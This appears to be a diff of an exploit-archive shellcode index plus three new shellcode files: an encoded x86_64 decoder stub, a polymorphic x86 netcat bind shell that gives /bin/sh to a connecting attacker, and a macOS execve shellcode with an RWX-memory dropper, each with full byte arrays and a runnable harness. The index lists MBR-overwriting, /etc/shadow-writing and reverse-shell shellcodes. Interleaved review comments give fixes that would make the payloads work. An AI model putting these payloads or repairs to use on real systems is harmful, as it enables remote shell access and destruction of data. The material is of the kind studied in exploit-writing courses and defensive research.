13563,shellcodes/linux_x86/13563.asm,"Linux/x86 - Overwrite MBR On /dev/sda With _LOL!' Shellcode (43 bytes)",2010-01-15,root@thegibson,,linux_x86,43,2010-01-14,2018-01-09,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-565.php
13323,shellcodes/linux_x86/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,,linux_x86,99,2009-03-02,2017-07-11,1,,,,,,http://shell-storm.org/shellcode/files/shellcode-74.php
51189,shellcodes/linux_x86/51189.txt,"Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes)",2023-04-01,"Eduardo Silva",,linux_x86,92,2023-04-01,2023-04-01,0,,,,,,
13332,shellcodes/linux_x86/13332.c,"Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)",2008-11-18,XenoMuta,,linux_x86,56,2008-11-17,2017-08-23,1,,,"Ho\' Detector",,,
13715,shellcodes/linux_x86/13715.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (83 bytes)",2010-05-27,agix,,linux_x86,83,2010-05-26,2018-01-17,1,,,,,,
43684,shellcodes/linux_x86/43684.c,"Linux/x86 - pwrite(/etc/shadow_ (md5 hash of agix)_ 32_ 8) Shellcode (89 bytes)",2009-01-01,agix,,linux_x86,89,2018-01-17,2018-01-17,0,,,,,,http://shell-storm.org/shellcode/files/shellcode-610.php
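Review bot: the 51189 description `Linux/x86 - Polymorphic linux x86 Shellcode (92 Bytes)` repeats the platform twice and omits what the shellcode does; the file's own title (`Polymorphic linux x86 nc -lvve/bin/sh -p13377 shellcode`) says it is a netcat bind shell on 13377/TCP. Following the naming of the neighbouring rows (`Linux - Bind (/TCP) Shell + ...`, `... Shellcode (185 bytes)`), suggest `Linux/x86 - Polymorphic Bind (13377/TCP) Shell (nc -lvve/bin/sh -p13377) Shellcode (92 bytes)`; `Bytes` should be lowercase to match every other row. The source_url column is left empty although the file header credits http://www.shell-storm.org/shellcode/files/shellcode-804.html as the original; that link is exactly what the column is for.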
@ -831,6 +833,7 @@ id,file,description,date_published,author,type,platform,size,date_added,date_upd
46397,shellcodes/macos/46397.c,"Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)",2019-02-18,"Ken Kitahara",,macos,31,2019-02-18,2019-05-23,0,,,,,,
46395,shellcodes/macos/46395.c,"Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)",2019-02-18,"Ken Kitahara",,macos,103,2019-02-18,2019-02-18,0,,,,,,
46393,shellcodes/macos/46393.c,"Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (119 bytes)",2019-02-18,"Ken Kitahara",,macos,119,2019-02-18,2019-05-23,0,,,,,,
51178,shellcodes/macos/51178.txt,"macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode",2023-04-01,boku,,macos,286,2023-04-01,2023-04-01,0,,,,,,
51177,shellcodes/macos/51177.txt,"macOS/x64 - Execve Null-Free Shellcode",2023-03-31,boku,,macos,253,2023-03-31,2023-03-31,0,,,,,,
39885,shellcodes/multiple/39885.c,"BSD / Linux / Windows (x86/x64) - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Shellcode (194 bytes) (Generator)",2016-06-06,odzhancode,,multiple,194,2016-06-16,2018-01-21,1,,,,http://www.exploit-db.com/screenshots/idlt40000/screen-shot-2016-06-16-at-80737-am.png,,
13469,shellcodes/multiple/13469.c,"BSD/x86 / Linux/x86 - execve(/bin/sh) Shellcode (38 bytes)",2004-09-12,dymitri,,multiple,38,2004-09-11,,1,,,,,,
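Review bot: 51178 is the only row in this block whose description omits the size (`macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode`) while the size column says 286 and the file header itself reads `(286 Bytes)`; add `(286 bytes)` for consistency with `Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes)` above it. The `macOS/x64 - ` prefix also differs from the `Apple macOS - ` prefix of the existing rows it sits beside, which is why it sorts after them instead of among them; pick one prefix (the existing `Apple macOS - execve(/bin/sh) + ...` style) and rename both 51178 and the earlier 51177 that shares the problem.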


shellcodes/linux/51191.txt (new file, 106 lines)

@ -0,0 +1,106 @@
## Exploit Title: FlipRotation v1.0 decoder - Shellcode (146 bytes)
## Exploit Author: Eduardo Silva
## Date: 2022-12-31
## Tested on: Linux x86_64 SMP Debian 4.19.260-1
## SLAE/Student ID: PA-31319
## Webpage: https://0xnibbles.github.io/
## Twitter: @0xnibbles
## Course: This shellcode was created for the x86 Assembly Language and Shellcoding on Linux (SLAE32) Course offered at pentesteracademy.com.
## Description: The inspiration for this algorithm was the known CBC bit-flipping attack but applying a simple variation to our context.
##
## More specifically, the steps are
##
## 1 - We pick each shelcode byte and flip the last bit using a xor operation - flipped_shellbyte = shellbyte ^ 0x01
## 2 - Based on that output the rotation direction is defined. We rotate right if odd or left if even. The number of rotation positions is defined by the loop index value (number of interations) of the loop at that time.
## 3 - If we rotate right we append 0x2 afther the encoded byte and if we rotate left we append 0xff
## 4 - Put the byte 0xa0 as the shellcode end marker
##
## More info at https://0xnibbles.github.io/posts/slae_32_assignment_4/ - the 64 bit version has the same logic as 32 bit
##
## Example:
## $ ./shellcode
## Shellcode Length: 146
## id
## uid=1000 ...
##
########################################################################
global _start
section .text
_start:
jmp decoder
EncodedShellcode: db 0x49,0xff,0x18,0x02,0x7,0xff,0x8a,0xff,0x94,0xff,0xd5,0x02,0xb8,0x02,0xb1,0xff,0x68,0x02,0xde,0xff,0x8b,0x02,0xc5,0x02,0x27,0x02,0x2d,0xff,0x49,0x02,0xa4,0xff,0x88,0x02,0x73,0x02,0x45,0xff,0x4a,0xff,0x88,0x02,0x7c,0xff,0x59,0x02,0xa4,0xff,0x88,0x02,0xcf,0xff,0x25,0xff,0x50,0x02,0x1c,0xff,0xd1,0x02,0x38,0x02,0x8,0x02,0xa0,0xa0 ; 0xa0 is the stop marker
decoder:
lea rsi, [rel EncodedShellcode]
lea rdi, [rsi+1] ; pointing to second byte (0x02) from shellcode
xor rax, rax
mul rax ; zeroes edx
mov al, 1
xor rcx, rcx
xor rbx, rbx
decode:
mov bl, byte [rsi + rax] ; mov parity byte to bl
xor bl, 0xa0 ; check if reached the end marker | 0xa0 ^ 0xff = 0x5f
jz short EncodedShellcode ; reached the marker if Zero Flag not set
xor bl, 0x5f ; if equal parity is even (0xff)
mov bl, byte [rsi + rdx]
jnz odd
even: ; rotate right
ror bl, cl
jmp short bitFlip
odd: ; rotate left
rol bl, cl
bitFlip:
xor bl, 0x01
restore_next_byte:
mov byte [rsi + rdx], bl ; replaces the original byte
mov bl, byte [rsi + rax+1] ; mov next shellbyte
mov byte [rdi], bl
inc rdi
add al, 2
inc dl
inc cl
; Doing circular array as modulo workaround. Use 0x08 as a divisor or circular boundary because we are rotating 8 bits (al register).
cmp cl, 0x08 ; if equal ZF will be set meaning we have a complete rotation
jnz decode ; $+2 ; jump if rotation is not complete
xor rcx, rcx ; if rotation is complete and reset cl to start again the "circular array"
jmp short decode
##############################################
// Filename: shellcode.c
// Compile: gcc -z execstack -fno-stack-protector shellcode.c -o shellcode
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x42\x49\xff\x18\x02\x07\xff\x8a\xff\x94\xff\xd5\x02\xb8\x02\xb1\xff\x68\x02\xde\xff\x8b\x02\xc5\x02\x27\x02\x2d\xff\x49\x02\xa4\xff\x88\x02\x73\x02\x45\xff\x4a\xff\x88\x02\x7c\xff\x59\x02\xa4\xff\x88\x02\xcf\xff\x25\xff\x50\x02\x1c\xff\xd1\x02\x38\x02\x08\x02\xa0\xa0\x48\x8d\x35\xb7\xff\xff\xff\x48\x8d\x7e\x01\x48\x31\xc0\x48\xf7\xe0\xb0\x01\x48\x31\xc9\x48\x31\xdb\x8a\x1c\x06\x80\xf3\xa0\x74\x9d\x80\xf3\x5f\x8a\x1c\x16\x75\x04\xd2\xcb\xeb\x02\xd2\xc3\x80\xf3\x01\x88\x1c\x16\x8a\x5c\x06\x01\x88\x1f\x48\xff\xc7\x04\x02\xfe\xc2\xfe\xc1\x80\xf9\x08\x75\xd0\x48\x31\xc9\xeb\xcb";
main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
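Review bot: two comments in the decoder state the opposite of what the code does, which matters for anyone adapting it. At `jz short EncodedShellcode ; reached the marker if Zero Flag not set`, `jz` is taken when ZF is set, i.e. when `bl ^ 0xa0 == 0` and the 0xa0 end marker has just been read, so the comment should say "if Zero Flag set"; and `mul rax ; zeroes edx` clears all of rdx, which is what the later `[rsi + rdx]` indexing relies on. The header should also say that the stub is self-modifying: `mov byte [rsi + rdx], bl` and `mov byte [rdi], bl` compact the decoded bytes over the encoded buffer in place, so the shellcode must sit in memory that is both writable and executable, which is the reason the harness has to be built with `-z execstack`. Minor harness points: `main()` has no return type and `strlen(code)` (a `size_t`) is printed with `%d`; `int main(void)` and `%zu` avoid the warnings.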

shellcodes/linux_x86/51189.txt (new file, 127 lines)

@ -0,0 +1,127 @@
# Exploit Title: Polymorphic linux x86 nc -lvve/bin/sh -p13377 shellcode (92 Bytes)
# Exploit Author: Eduardo Silva
# Date: 2022-12-28
# Tested on: Linux x86_64 SMP Debian 4.19.260-1
# SLAE/Student ID: PA-31319
# Webpage: https://0xnibbles.github.io/
# Description: This shellcode is a polymorphic version of http://www.shell-storm.org/shellcode/files/shellcode-804.html.
# Shellcode is converted to raw opcodes and splitted in various "pieces" and those are decoded in runtime. Each "piece" of code is a preparation to nc arguments.
# To determine the end of each "piece" of opcodes that represent shellcode a nop (0x90) is used instead of a null bytes. the nop is decoded in runtime.
# The instruction - lea $Register, [esi+4] -determines which argument is being set up
# It leverages the x87 FPU instructions fnop and fnstenv to store EIP onto the stack and jump for the relative address in runtime. This used to avoid using call to perform relative jump as this introduces null bytes.
# For example, the relatiev call instruction - call $ + 0x12 ;\xe8\x0d\x00\x00\x00 - results in null bytes being added. USing fnstenv avoids this situation
#
# Example:
# $ ./shellcode
# Shellcode Length: 92
# listening on [any] 13377
#
# [...]
# $ nc 127.0.0.1 13377
# id
# uid=1000 ...
#
####################################
;Polymorphic linux x86 nc -lvve/bin/sh -p13377 shellcode
;This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
global _start
section .text
_start:
xor eax,eax
mov al, 0x8
fnop
jmp short argParser ;fnstenv will make x87 FPU store this address
; the argParser stub adds 4 bytes to the stored and redirect execution to the next isntruction
sub eax,0x33317076
xor esi,DWORD [edi]
aaa
nop
lea edx, [esi+4]
mov al, 0xc
fnop
jmp short argParser
sub eax,0x6576766c ; \xe8\x0e\x00\x00\x00
das
bound ebp, [ecx+0x6e]
das
jae $+0x6a
nop
lea ecx, [esi+4]
;call $ + 0x12 ;\xe8\x0d\x00\x00\x00 --> example of how a call introduces null bytes
mov al, 0xc
fnop
jmp short argParser
das
bound ebp, [ecx+0x6e]
das
das
das
das
das
das
outsb
arpl word [eax],bx
lea ebx, [esi+4]
push eax
push edx
push ecx
push ebx
cdq
mov ecx,esp
mov al, 0xb
int 0x80
argParser: ; similar to jmp-call-pop but calls to a nop byte
; assuming al has the right distance
fnstenv [esp-0xc]
;pop esi
mov byte [esi + 0x4 + eax], ah ; null-byte decoder
lea edi, [esi + 0x4+eax+0x1]
xor eax,eax
jmp edi
##############################################
// Filename: shellcode.c
// Compile: gcc -m32 -z execstack -fno-stack-protector shellcode.c -o shellcode
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0"
"\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b"
"\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0"
"\x0b\xcd\x80\xd9\x74\x24\xf4\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7";
main() {
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
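Review bot: the argParser stub never loads ESI. `fnstenv [esp-0xc]` leaves the saved FPU instruction pointer, the address of the last `fnop`, at `[esp]`, but the `;pop esi` that would move it into ESI is commented out and is also absent from the byte array (`\xd9\x74\x24\xf4` is followed directly by `\x88\x64\x06\x04`, the `mov byte [esi + 0x4 + eax], ah`). Every address the stub computes (`mov byte [esi + 0x4 + eax], ah`, `lea edi, [esi + 0x4+eax+0x1]`, and the three `lea edx/ecx/ebx, [esi+4]` argument pointers) therefore depends on whatever ESI held on entry, and nothing here establishes that value; uncomment `pop esi` (`\x5e`, null-free) right after the `fnstenv` and regenerate the byte array. Two smaller points: the array as printed holds 91 bytes, not the 92 the title and the sample output claim, so recount after the fix; and the third chunk ends in `0x18` (disassembled above as `arpl word [eax],bx`) while the header says every chunk ends in a `0x90` nop, so either document that any non-null byte works as the marker or use 0x90 there as well.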

shellcodes/macos/51178.txt (new file, 244 lines)

@ -0,0 +1,244 @@
# Shellcode Title: macOS/x64 - Execve Caesar Cipher String Null-Free Shellcode (286 Bytes)
# Shellcode Author: Bobby Cooke (boku) @0xBoku github.com/boku7
# Date: 12/20/2022
# Tested on: macOS Monterey; 21.6.0 Darwin Kernel Version; x86_64
# Shellcode Description:
# macOS 64 bit shellcode. Uses execve syscall to spawn bash. The string is ceasar cipher crypted with the increment key of 7 within the shellcode. The shellcode finds the string in memory, copies the string to the stack, deciphers the string, and then changes the string terminator to 0x00.
# Shoutout to IBM X-Force Red Adversary Simulation team! Currently working through EXP-312 and tinkering with macOS shellcoding. Shoutout to the offsec team for the cool course!
# Compile & run:
# nasm -f macho64 execve.asm -o execve
# for x in $(objdump -d execve --x86-asm-syntax=intel | grep "^ " | cut -f1 | awk -F: '{print $2}'); do echo -n "\x"$x; done; echo
# # Add shellcode to dropper.c
# gcc dropper.c -o dropper
# sh-3.2$ pstree -p $(echo $$) | grep $$
# \-+= 28533 bobby sh
# sh-3.2$ ./dropper
# [+] testcode Length: 286 Bytes
# [+] Copying testcode from variable at 0x10aeeade0 to allocated RWX memory at 0x10b030000
# [+] Executing testcode at 0x10b030000
# bobby$ pstree -p $(echo $$) | grep -B1 $$
# \-+= 28533 bobby sh
# \-+= 28584 bobby (bash)
bits 64
global _main
_main:
create_stackframe:
push rbp ; push current base pointer to the stack
mov rbp, rsp ; Set Base Stack Pointer for new Stack-Frame
sub rsp, 0x60 ; create space for string
mov [rbp-0x8], rsp ; Save destination string buffer address
jmp short lilypad_1
; char * string eggHunter(egg);
; RAX RDIa
; description: starts searching for the supplied egg starting from the callers return address
eggHunter:
mov rcx, [rsp] ; start the egghunter from the caller function return address
hunt:
inc rcx ; move to the hunter to the next byte
cmp [rcx], di ; did we find the first egg?
jne hunt ; if not, continue hunt
add cx, 0x2 ; move hunter to 2nd egg location
cmp [rcx], di ; did we find the second egg?
jne hunt ; if not, continue hunt
add cx, 0x2 ; both eggs found! Move hunter +2 to return the start of buffer addr
xchg rax, rcx ; return start of string address
ret
; int length strsize(&string, terminator);
; RAX RDI RSI
; description: gets string size of a string that is terminated with a predetermined non-null byte. Terminator byte not included.
strsize:
xor rax, rax ; clear register
xor rcx, rcx ; set the counter to zero
strsize_loop:
mov rcx, rdi ; start of string address
add rcx, rax ; current memory location of char in string
cmp [rcx], sil ; is this the null terminator?
je strsize_return
prevent_infinite_loop:
cmp ax, 0x1001 ; compare value in RAX to 0x1001 (prevent infinite mem scanning)
jg strsize_fail2find ; if value in RAX is greater, jump to label
inc rax ; move to the next char in the string
jmp strsize_loop
strsize_fail2find:
xor rax, rax ; return null/ 0x0
strsize_return:
ret
lilypad_1:
jmp short lilypad_2
; char * string terminateString(&string, terminator);
; RAX RDI RSI
; description: Finds the string terminator and changes it to a null byte
terminateString:
xor rcx, rcx ; set the counter to zero
mov rcx, rdi ; start address to look for terminator
loop_find_terminator:
cmp [rcx], sil ; is this the null terminator?
je found_terminator
inc rcx ; move to the next char in the string
jmp loop_find_terminator
found_terminator:
mov [rcx], al
ret
; void * dst_addr move_memory(void *dst_addr, void *src_addr, size_t mem_size);
; RAX RDI RSI RDX
; description: Move memory from source address to destination address
; ARG1 - RDI: destination address
; ARG2 - RSI: source address
; ARG3 - RDX: size of the memory
move_memory:
; Loop through memory and move each byte from source to destination
push rdi ; save the destination address so we can return it at the end
xor rax, rax ; register to temporarily hold the byte we are copying
move_memory_loop:
mov al, [rsi] ; read the byte from source address into the temporary register
mov [rdi], al ; write the byte at the destination address
inc rsi ; increment source address
inc rdi ; increment destination address
dec rdx ; decrement memory size
jnz move_memory_loop ; repeat loop until memory size is 0
; Return to caller
pop rax ; return the destination address of the memory to the caller
ret
lilypad_2:
jmp short lilypad_3
; void clear_memory(void *dst_addr, size_t mem_size);
; RDI RSI
; description: Writes 0x00 bytes to a destination address
; ARG1 - RDI: a pointer to the destination address
; ARG2 - RSI: the size of the memory to be written to
clear_memory:
mov rcx, rsi ; load memory size from second argument into rcx
xor rax, rax
; Loop through memory and write 0x00 to each byte in destination address
clrmem_loop:
mov byte [rdi], al ; write 0x00 to byte in destination address
inc rdi ; increment destination address
dec rcx ; decrement memory size
jnz clrmem_loop ; repeat loop until memory size is 0
ret ; Return to caller
; void basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);
; RDI RSI RDX
basicCaesar_Decrypt:
bcd_loop:
sub [rsi], dl ; Subtract the value of dl from the memory location pointed to by RSI
inc rsi ; Increment RSI to point to the next character
dec rdi ; Decrement stringLength counter
test rdi,rdi ; Test if stringLength counter is zero
jnz bcd_loop ; If stringLength counter is not zero, jump back to the beginning of the loop
ret ; Return to caller
lilypad_3:
; *string = eggHunter(egg); Starts hunt from return address of caller
find_execve_string:
xor rdi, rdi ; clear register
mov di, 0xBCB0 ; Arg 1: Our egg
call eggHunter ; returns string start address
mov [rbp-0x10], rax ; Save string address
get_strlen:
mov rdi, [rbp-0x10] ; Arg 1: string start address
xor rsi, rsi ; clear register
mov sil, 0xFF ; Arg 2: string terminator
call strsize ; returns string size
mov [rbp-0x18], rax ; Save string size
; move_memory(dst_addr, src_addr, mem_size);
; RDI RSI RDX
copy_str2stack:
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
mov rsi, [rbp-0x10] ; Arg 2: Original string location
mov rdx, [rbp-0x18] ; Arg 3: size
call move_memory
; basicCaesar_Decrypt(int stringLength, unsigned char * string, int chiperDecrementKey);
; RDI RSI RDX
do_caesar_cipher_decrypt:
mov rdi, [rbp-0x18] ; Arg 1: string size
mov rsi, [rbp-0x8] ; Arg 2: String buffer on stack
xor rdx, rdx ; clear register
add dl, 0x7 ; Arg 3: Ceaser Chiper Key: 7
call basicCaesar_Decrypt ; returns string size
do_terminate_string:
mov rdx, [rbp-0x18] ; string size
mov rdi, [rbp-0x8] ; String buffer on stack
add rdi, rdx ; Arg 1: string terminator location
xor rsi, rsi ; clear register
mov sil, 0x1 ; Arg 2: mem size to null
call clear_memory ; returns string size
; execve("/bin/bash",NULL,NULL)
execve:
mov rdi, [rbp-0x8] ; Arg 1: String buffer on stack
xor rsi, rsi ; Arg 2: NULL
xor rdx, rdx ; Arg 3: NULL
xor rax, rax ; clear register for syscall number setup
mov al, 0x2 ; set a bit in register
ror rax, 0x28 ; move the bit over 28 bits to the right in the register
mov al, 0x3b ; set the lower byte (AL) of the RAX register to the execve syscall number
syscall ; do the syscall interrupt
fixstack:
add rsp, 0x60 ; clear allocated stack space
pop rbp ; restore stack base pointer
ret ; return to caller
; ~~ Ceaser Chiper String Cryptor ~~
; Original String: /bin/bash
; String Length: 9
; Ceaser Chiper Key: 7
; Chiper String: 6ipu6ihzo
; unsigned char chiperString[] = {0x36,0x69,0x70,0x75,0x36,0x69,0x68,0x7a,0x6f};
; unsigned char chiperString[] = "\x36\x69\x70\x75\x36\x69\x68\x7a\x6f";
; Dechipered String: /bin/bash
shell_path_string: db 0xB0,0xBC,0xB0,0xBC,"6ipu6ihzo",0xFF
###########################################################################################################################################
// dropper.c
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*execute_testcode)();
const unsigned char testcode[] =
"\x55\x48\x89\xe5\x48\x83\xec\x60\x48\x89\x65\xf8\xeb\x3c\x48\x8b\x0c\x24\x48\xff\xc1\x66\x39\x39\x75\xf8\x66\x83\xc1\x02\x66\x39\x39\x75\xef\x66\x83\xc1\x02\x48\x91\xc3\x48\x31\xc0\x48\x31\xc9\x48\x89\xf9\x48\x01\xc1\x40\x38\x31\x74\x0e\x66\x3d\x01\x10\x7f\x05\x48\xff\xc0\xeb\xea\x48\x31\xc0\xc3\xeb\x28\x48\x31\xc9\x48\x89\xf9\x40\x38\x31\x74\x05\x48\xff\xc1\xeb\xf6\x88\x01\xc3\x57\x48\x31\xc0\x8a\x06\x88\x07\x48\xff\xc6\x48\xff\xc7\x48\xff\xca\x75\xf1\x58\xc3\xeb\x1f\x48\x89\xf1\x48\x31\xc0\x88\x07\x48\xff\xc7\x48\xff\xc9\x75\xf6\xc3\x28\x16\x48\xff\xc6\x48\xff\xcf\x48\x85\xff\x75\xf3\xc3\x48\x31\xff\x66\xbf\xb0\xbc\xe8\x6d\xff\xff\xff\x48\x89\x45\xf0\x48\x8b\x7d\xf0\x48\x31\xf6\x40\xb6\xff\xe8\x76\xff\xff\xff\x48\x89\x45\xe8\x48\x8b\x7d\xf8\x48\x8b\x75\xf0\x48\x8b\x55\xe8\xe8\x96\xff\xff\xff\x48\x8b\x7d\xe8\x48\x8b\x75\xf8\x48\x31\xd2\x80\xc2\x07\xe8\xab\xff\xff\xff\x48\x8b\x55\xe8\x48\x8b\x7d\xf8\x48\x01\xd7\x48\x31\xf6\x40\xb6\x01\xe8\x84\xff\xff\xff\x48\x8b\x7d\xf8\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\xb0\x02\x48\xc1\xc8\x28\xb0\x3b\x0f\x05\x48\x83\xc4\x60\x5d\xc3\xb0\xbc\xb0\xbc\x36\x69\x70\x75\x36\x69\x68\x7a\x6f\xff";
int main() {
size_t testcode_size = sizeof(testcode);
printf("[+] testcode Length: %lu Bytes\n", testcode_size);
void *rwx_memory = mmap(0, 0x1024, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0);
if (rwx_memory == MAP_FAILED) {
printf("[!] Failed to allocate RWX memory\n");
perror("mmap");
exit(-1);
}
printf("[+] Copying testcode from variable at %p to allocated RWX memory at %p\n",testcode,rwx_memory);
memcpy(rwx_memory, testcode, sizeof(testcode));
execute_testcode = rwx_memory;
printf("[+] Executing testcode at %p\n",rwx_memory);
execute_testcode();
return 0;
}
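Review bot: in `eggHunter`, the two `add cx, 0x2` instructions operate on the low 16 bits of the scan pointer, so if `rcx` is within two bytes of a 64 KiB boundary the carry is lost and the hunter jumps back 64 KiB instead of forward; `add rcx, 0x2` encodes as `48 83 c1 02`, the same length and still null-free, and removes that edge case. `terminateString` (`; char * string terminateString(&string, terminator);`) is dead code: nothing calls it, the `mov [rcx], al` at `found_terminator` stores a value no caller passes in, and the job is done instead by `clear_memory` with a size of 1 in `do_terminate_string`; dropping it saves bytes and one `lilypad` hop. Two comment fixes: `ror rax, 0x28 ; move the bit over 28 bits` rotates by 0x28 = 40 bits (that is how the `0x2` placed in AL becomes the `0x2000000` BSD syscall class in the upper bytes before `mov al, 0x3b`), and the header's `Ceaser Chiper` should read `Caesar cipher` throughout. In the dropper, `mmap(0, 0x1024, ...)` looks like a typo for `0x1000`; it is harmless because the length is page-rounded, but worth correcting.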